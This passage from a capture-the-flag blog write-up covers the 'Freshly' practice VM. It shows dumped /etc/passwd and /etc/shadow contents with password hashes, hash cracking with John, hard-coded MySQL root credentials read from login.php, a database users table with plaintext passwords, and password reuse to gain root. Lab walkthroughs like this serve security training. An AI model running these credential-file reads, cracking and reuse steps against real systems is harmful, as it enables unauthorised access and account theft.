www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$
___________________________________________________________________
This was probably enough to satisfy the requirements of the Challenge, but I continued.
I ran John against the password hashes using my favorite wordlist:
I probably didn't have to but I login as the cracked user "candycane"
Running an enumeration script, I found that the login.php file had database credentials hard coded in it:
candycane@Freshly:/var/www/html$ cat login.php
cat login.php
mysql_connect('localhost','root','SuperSecretPassword');
mysql_select_db('login');
?>
cat login.php
mysql_connect('localhost','root','SuperSecretPassword');
mysql_select_db('login');
?>
Same password as wordpress, nobody does that, yeah right...
So I logged in as the DB root user with these credentials and enumerated a bit more:
candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080
d wordpress8080ot --password=SuperSecretPasswor
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4886
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| login |
| mysql |
| performance_schema |
| phpmyadmin |
| users |
| wordpress8080 |
+--------------------+
7 rows in set (0.00 sec)
mysql> show tables from login;
show tables from login;
+-----------------+
| Tables_in_login |
+-----------------+
| user_name |
| users |
+-----------------+
2 rows in set (0.00 sec)
mysql> use login;
use login;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from users;
select * from users;
+-----------+----------+
| user_name | password |
+-----------+----------+
| candyshop | password |
| Sir | PopRocks |
+-----------+----------+
2 rows in set (0.00 sec)
mysql>
______________________________________________________________________________
So this yielded a little more information. I chose not to continue enumerating and decided to try to use the same reused password for the root account and bingo!
I pwned the box:
Overall, I enjoyed this VM challenge do to its realism. Some challenges are fun and thought provoking, but I enjoy the ones that mimic real-world systems and human mistakes. Thanks to the guys at Top-Hat-Sec.
Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL
No comments:
Post a Comment